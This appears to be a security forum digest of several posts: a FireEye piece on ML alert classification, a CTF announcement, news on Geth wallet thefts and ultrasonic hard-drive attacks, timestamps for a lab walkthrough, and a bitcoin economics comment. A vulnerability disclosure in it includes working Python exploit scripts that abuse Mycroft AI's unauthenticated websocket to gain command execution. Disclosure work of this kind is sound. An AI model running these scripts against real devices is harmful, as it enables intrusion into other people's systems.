     Additionally, it is possible to write rules using the output of the model as a parameter. If the model is particularly confident on a subset of alerts, and the SOC feels comfortable automatically classifying that family of threats, it is possible to simply write a rule that says: "If the alert is of this type, AND for this malware family, AND the model confidence is above 99, automatically call this alert bad and generate a report." Or, if there is a storm of probable false positives, one could write a rule to cull the herd using a model score below 10.

     How the Model Stays Effective

     The day the model is trained, it stops learning. However, threats, and therefore alerts, are constantly evolving. Thus, it is imperative to continually retrain the model with new alert data to ensure it continues to learn from changes in the environment. Additionally, it is critical to monitor the overall efficacy of the model over time. Building an efficacy analysis pipeline to compare model results against analyst feedback will help identify whether the model is beginning to drift or develop structural biases. Evaluating and incorporating analyst feedback is also critical to identify and address specific misclassifications, and to discover potential new features that may be necessary.

     To accomplish these goals, we run a background job that updates our training database with newly labeled events. As we get more and more alerts, we periodically retrain our model with the new observations. If we encounter issues with accuracy, we diagnose and work to address them. Once we are satisfied with the overall accuracy score of our retrained model, we store the model object and begin using that model version.

     We also provide a feedback mechanism for analysts to record when the model is wrong. An analyst can look at the label provided by the model and its explanation, but can also make their own decision. Whether they agree with the model or not, they can input their own label through the interface. We store the analyst's label, along with any optional explanation they give for their decision.

     Finally, it should be noted that these manual labels may require further evaluation. As an example, consider a commodity malware alert in which network command-and-control communications were sinkholed. An analyst may evaluate the alert, pull back triage details including PCAP samples, and see that while the malware executed, the true threat to the environment was mitigated. Since it does not represent an exigent threat, the analyst may mark this alert as 'benign'. However, the fact that it was sinkholed does not change that the artifacts of execution still represent malicious activity. Under different circumstances, this infection could have had a negative impact on the organization.
     However, if the benign label is used when retraining the model, it will teach the model that something inherently malicious is in fact benign, potentially leading to false negatives in the future. Monitoring efficacy over time, updating and retraining the model with new alerts, and evaluating manual analyst feedback gives us visibility into how the model is performing and learning over time. Ultimately this helps build confidence in the model, so we can automate more tasks and free up analyst time for tasks such as hunting and investigation.

     Conclusion

     A supervised learning model is not a replacement for an experienced analyst. However, incorporating predictive analytics and machine learning into the SOC workflow can help augment the productivity of analysts, free up time, and ensure they apply their investigative skills and creativity to the threats that truly require expertise.

     This blog post outlines the major components and considerations of building an alert classification model for the SOC. Data collection, labeling, feature generation, model training, and efficacy analysis must all be carefully considered when building such a model. FireEye continues to iterate on this research to improve our detection and response capabilities, continually improve the detection efficacy of our products, and ultimately protect our clients.

     The processes and examples discussed in this post are not mere research. Within our FireEye Managed Defense SOC, we use alert classification models built using the aforementioned processes to increase our efficiency and ensure we apply our analysts' expertise where it is needed most. In a world of ever-increasing threats and alerts, increasing SOC efficiency may mean the difference between missing and catching a critical intrusion.

     Source
    1 point
  9. Google Capture the Flag 2018

     The qualification round will begin June 23 and finish June 24.

     1. First place wins $13,337 USD
     2. Second place wins $7,331 USD
     3. Third place wins $3,133.7 USD

     We will also pay $100 to $500 USD for each of the best 32 writeups.

     https://ctftime.org/event/623
     https://capturetheflag.withgoogle.com/
    1 point
  10. While hackers are always hunting for ways to steal money, some vulnerabilities make successful crypto heists even easier. Recently, experts from Qihoo 360's Netlab, a Chinese cybersecurity firm, revealed a massive theft of $20 million worth of Ethereum by hackers. Apparently, a Geth vulnerability allowed the hackers to pull off this theft from unsafe clients.

     Geth Vulnerability Made Ethereum Clients Unsafe

     A few months ago, 360 Netlab warned crypto traders about how a Geth vulnerability could let hackers steal money. The issue affected port 8545, which allowed a hacker to access Geth clients. Now, the researchers confirm that their speculation was right. In fact, they not only confirmed the vulnerability, they also proved it is being actively exploited. According to their recent tweet, hackers have already stolen $20 million worth of Ethereum from unsecured Geth clients.

     Geth is a popular client for running full Ethereum nodes that lets users manage them remotely through a JSON-RPC interface. According to 360 Netlab, Geth by default 'listens on port 8545'. Hackers therefore actively scan for exposed 8545 ports to steal cryptocurrency. Usually, this port is available only locally and is not open to the external internet, so anyone with this port open publicly is a target.

     Securing Your Wallets From Hackers

     A quick scan of the hacker's address will tell you the exact amount. When LHN looked over the hacker's account (0x957cD4Ff9b3894FC78b5134A8DC72b032fFbC464), the amount stolen seemed to have increased further, crossing the amount of Ether reported earlier (38,642.23856 ETH). At the time of writing this article, the hacker's wallet shows 38,642.68624 ETH as available. This proves that the hackers are still actively stealing money from unsecured wallets.

     According to 360 Netlab, you can view these addresses in the payload: "If you've honeypot running on port 8545, you should be able to see the requests in the payload which has the wallet addresses. There are quite a few IPs scanning heavily on this port now." The researchers have also disclosed some wallet addresses that supposedly belong to hackers.

     Users should only connect to Geth clients from local computers. They can also enable user authorization for remote RPC connections. (A quick way to check whether a node answers RPC on the default port is sketched below.)

     Via latesthackingnews.com
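     As a defensive check, one might probe whether one's own node answers JSON-RPC on the default port 8545 from the outside. A minimal sketch using only the standard library; the host below is a placeholder, and web3_clientVersion is a standard, harmless JSON-RPC method:

     #!/usr/bin/env python
     # Minimal sketch: check whether a Geth node answers JSON-RPC on the
     # default port 8545 (it should not be reachable from the outside).
     import json
     import urllib.request

     def rpc_exposed(host, port=8545, timeout=5):
         payload = json.dumps({"jsonrpc": "2.0", "method": "web3_clientVersion",
                               "params": [], "id": 1}).encode()
         req = urllib.request.Request("http://%s:%d" % (host, port), data=payload,
                                      headers={"Content-Type": "application/json"})
         try:
             with urllib.request.urlopen(req, timeout=timeout) as resp:
                 return json.load(resp).get("result")  # e.g. "Geth/v1.8.x/..."
         except OSError:
             return None  # connection refused or timed out: not exposed

     if __name__ == "__main__":
         result = rpc_exposed("203.0.113.10")  # placeholder address
         print("EXPOSED: %s" % result if result else "port 8545 not reachable")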
    1 point
  11. Full Video:

     02:08 - Begin of Recon
     14:00 - XXE Detection on Fulcrum API
     17:40 - XXE Get Files
     23:40 - XXE File Retrieval Working
     24:30 - Lets Code a Python WebServer to Aid in XXE Exploitation
     39:45 - Combining XXE + SSRF (Server Side Request Forgery) to gain Code Execution
     47:28 - Shell Returned + Go Over LinEnum
     56:49 - Finding WebUser's Password and using WinRM to pivot
     01:06:00 - Getting Shell via WinRM, finding LDAP Credentials
     01:14:00 - Using PowerView to Enumerate AD Users
     01:27:06 - Start of getting a Shell on FILE (TroubleShooting FW)
     01:35:35 - Getting shell over TCP/53 on FILE
     01:37:58 - Finding credentials on scripts in Active Directory's NetLogon share, then finding a way to execute code as the Domain Admin... Triple Hop Nightmare
     01:58:10 - Troubleshooting the error correctly and getting Domain Admin!
     02:03:54 - Begin of unintended method (Rooting the initial Linux Hop)
     02:09:54 - Root Exploit Found
     02:12:25 - Mounting the VMDK Files and accessing AD.
    1 point
  12. "Hey Mycroft, we've got a Problem" Getting "Zero Click" Remote Code Execution in Mycroft AI vocal assistant Introduction During my journey contributing to open source I was working with my friend Matteo De Carlo on an AUR Package of a really interesting project called Mycroft AI. It's an AI-powered vocal assistant started with a crowdfunding campaign in 2015 and a more recent one that allowed Mycroft to produce their Mark-I and Mark-II devices. It's also running on Linux Desktop/Server, Raspberry PI and will be available soon™ on Jaguar Type-F and Land Rover Digging in the source code While looking at the source code I found an interesting point: here ... host = config.get("host") port = config.get("port") route = config.get("route") validate_param(host, "websocket.host") validate_param(port, "websocket.port") validate_param(route, "websocket.route") routes = [ (route, WebsocketEventHandler) ] application = web.Application(routes, **settings) application.listen(port, host) ioloop.IOLoop.instance().start() ... So there is a websocket server that doesn't require authentication that by default is exposed on 0.0.0.0:8181/core. Let's test it #!/usr/bin/env python import asyncio import websockets uri = "ws://myserver:8181/core" command = "say pwned" async def sendPayload(): async with websockets.connect(uri) as websocket: await websocket.send("{\"data\": {\"utterances\": [\""+command+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}") asyncio.get_event_loop().run_until_complete(sendPayload()) And magically we have an answer from the vocal assistant saying pwned! Well, now we can have Mycroft pronounce stuff remotely, but this is not a really big finding unless you want to scare your friends, right? The skills system Digging deeper we can see that Mycroft has a skills system and a default skill that can install others skills (pretty neat, right?) How is a skill composed? From what we can see from the documentation a default skill is composed by: dialog/en-us/command.dialog contains the vocal command that will trigger the skill vocab/en-us/answer.voc contains the answer that Mycroft will pronounce requirements.txt contains the requirements for the skill that will be installed with pip __int__.py contains the main function of the skill and will be loaded when the skill is triggered What can I do? I could create a malicious skill that when triggered runs arbitrary code on the remote machine, but unfortunately this is not possible via vocal command unless the URL of the skill is not whitelisted via the online website. So this is possible but will be a little tricky. So I'm done? Not yet. I found out that I can trigger skills remotely and that is possible to execute commands on a remote machine convincing the user to install a malicious skill. I may have enough to submit a vulnerability report. But maybe I can do a bit better... Getting a remote shell using default skills We know that Mycroft has some default skills like open that will open an application and others that are whitelisted but not installed. Reading through to the list, I found a really interesting skill called skill-autogui, whose description says Manipulate your mouse and keyboard with Mycroft. We got it! 
     Let's try to combine everything we found so far into a PoC:

     #!/usr/bin/env python
     import sys
     import asyncio
     import websockets
     import time

     cmds = ["mute audio"] + sys.argv[1:]
     uri = "ws://myserver:8181/core"

     async def sendPayload():
         for payload in cmds:
             async with websockets.connect(uri) as websocket:
                 await websocket.send("{\"data\": {\"utterances\": [\""+payload+"\"]}, \"type\": \"recognizer_loop:utterance\", \"context\": null}")
             time.sleep(1)

     asyncio.get_event_loop().run_until_complete(sendPayload())

     Running the exploit with python pwn.py "install autogui" "open xterm" "type echo pwned" "press enter" finally got me command execution on a Linux machine.

     Notes

     - open xterm was needed because my test Linux environment had a DE installed; on a remote server the commands will be executed directly on the TTY, so this step is not necessary.
     - The skills branching had a big change and some skills are not (yet) available (autogui is one of them), but this is not the real point. Mycroft has skills to interact with home automation and other services that can still be manipulated (imagination is the only limit here).
     - The vulnerability lies in the lack of authentication for the websocket.

     Affected devices

     All devices running Mycroft <= ? with the websocket server exposed (the Mark-I has the websocket behind a firewall by default).

     Interested in my work? Follow me on:
     Twitter: @0x7a657461
     Linkedin: https://linkedin.com/in/0xzeta
     GitHub: https://github.com/Nhoya

     Timeline

     08/03/2018 Vulnerability found
     09/03/2018 Vulnerability reported
     13/03/2018 The CTO answered that they are aware of this problem and are currently working on a patch
     06/06/2018 The CTO said that they have no problem with the release of the vulnerability and will add a warning reminding users to use a firewall ¯\_(ツ)_/¯
     09/06/2018 Public disclosure

     Source
    1 point
  13. Researchers have demonstrated how sonic and ultrasonic signals (inaudible to humans) can be used to cause physical damage to hard drives, just by playing ultrasonic sounds through a target computer's own built-in speaker or by exploiting a speaker near the targeted device.

     Similar research was conducted last year by a group of researchers from Princeton and Purdue University, who demonstrated a denial-of-service (DoS) attack against HDDs by exploiting a physical phenomenon called acoustic resonance. Since HDDs are exposed to external vibrations, the researchers showed how specially crafted acoustic signals can cause significant vibrations in an HDD's internal components, which eventually leads to failure in systems that rely on the HDD.

     To prevent a head crash from acoustic resonance, modern HDDs use shock-sensor-driven feedforward controllers that detect such movement and improve head-positioning accuracy while reading and writing data. However, according to a new research paper published by a team of researchers from the University of Michigan and Zhejiang University, sonic and ultrasonic sounds cause false positives in the shock sensor, making the drive unnecessarily park its head.

     By exploiting this disk drive vulnerability, the researchers demonstrated how attackers could carry out successful real-world attacks against HDDs found in CCTV (closed-circuit television) systems and desktop computers. These attacks can be performed using a nearby external speaker or through the target system's own built-in speakers, by tricking the user into playing a malicious sound attached to an email or embedded in a web page.

     In their experimental setup, the researchers tested acoustic and ultrasonic interference against various HDDs from Seagate, Toshiba and Western Digital and found that ultrasonic waves took just 5-8 seconds to induce errors. Sound interference that lasted 105 seconds or more caused the stock Western Digital HDD in the video-surveillance device to stop recording from the beginning of the vibration until the device was restarted.

     The researchers were also able to disrupt HDDs in desktops and laptops running both Windows and Linux. It took just 45 seconds to cause a Dell XPS 15 9550 laptop to freeze, and 125 seconds to crash it, when the laptop was tricked into playing malicious audio over its built-in speaker.

     The team also proposed some defenses that can be used to detect or prevent this type of attack: a new feedback controller that could be deployed as a firmware update to attenuate intentional acoustic interference, a sensor-fusion method to prevent unnecessary head parking by detecting ultrasonic triggering of the shock sensor, and noise-dampening materials to attenuate the signal.

     You can find out more about HDD ultrasonic acoustic attacks in a research paper [PDF] titled "Blue Note: How Intentional Acoustic Interference Damages Availability and Integrity in Hard Disk Drives and Operating Systems." (For intuition about the signals involved, a small tone-synthesis sketch follows below.)

     Via thehackernews.com
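     For intuition, the acoustic signals discussed above are essentially sustained pure tones at a chosen frequency. A minimal sketch that synthesizes one into a WAV file using only the standard library; the 5 kHz / 10-second values are arbitrary placeholders, not frequencies from the paper:

     #!/usr/bin/env python
     # Minimal sketch: write a sustained pure tone to a WAV file.
     # Frequency and duration are placeholders, not values from "Blue Note".
     import math
     import wave
     import struct

     RATE = 44100      # samples per second
     FREQ = 5000.0     # tone frequency in Hz (placeholder)
     SECONDS = 10      # duration in seconds (placeholder)

     with wave.open("tone.wav", "w") as f:
         f.setnchannels(1)   # mono
         f.setsampwidth(2)   # 16-bit samples
         f.setframerate(RATE)
         for i in range(RATE * SECONDS):
             sample = int(32767 * 0.8 * math.sin(2 * math.pi * FREQ * i / RATE))
             f.writeframesraw(struct.pack("<h", sample))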
    1 point
  14. It's a circle; I hope you don't need me to draw it. Cutarescu sells food and pays employees, who in turn spend money on food, utilities, a car and other junk, all of which are produced by Cutarescu 2 and 3. Cutarescu's investment goes into rent (the location was built by someone, again a circle), raw materials, etc. The ones who lose are the consumers, the ones living month to month, because they have to survive. That's why the food example doesn't really fit bitcoin. Food is a necessity good (necessity goods are goods that we cannot live without and will not likely cut back on even when times are tough, for example food, power, water and gas). It also doesn't hurt to know about substitute goods; from "decent options" to "monopoly" is a long way. It may not be Subway, but people will still buy a bun and two slices of bologna from the shop.

     Bankruptcy is just the result of the market self-regulating. Cutarescu opens a fast food place; there were already 4 of them, but supply didn't exceed demand. Then the balance flips, supply exceeds demand, and the weakest/least performing one shuts down. Simple. Prices drop too; the best example is the price of oil.

     Coming back to bitcoin: to understand/visualize that someone always loses, you have to close the circle, that is, withdraw all the invested capital and get back to 0. Or the price is 1000, climbs to 2000 and drops back to 1000; same thing. With fiat, the state can pump in money, as America did during its economic crises. There was a documentary claiming the US only got out of the 1930s crisis after entering World War II. https://en.wikipedia.org/wiki/File:US_Unemployment_1910-1960.gif

     Edit: Documentary https://youtu.be/CkHooEp3vRE?t=41m1s

     Another context in which you can see who loses is a scenario where everyone sells at the price they bought at (a utopia). In that case nobody loses, but nobody gains either; at the opposite pole, someone will always lose once you draw the line.
    1 point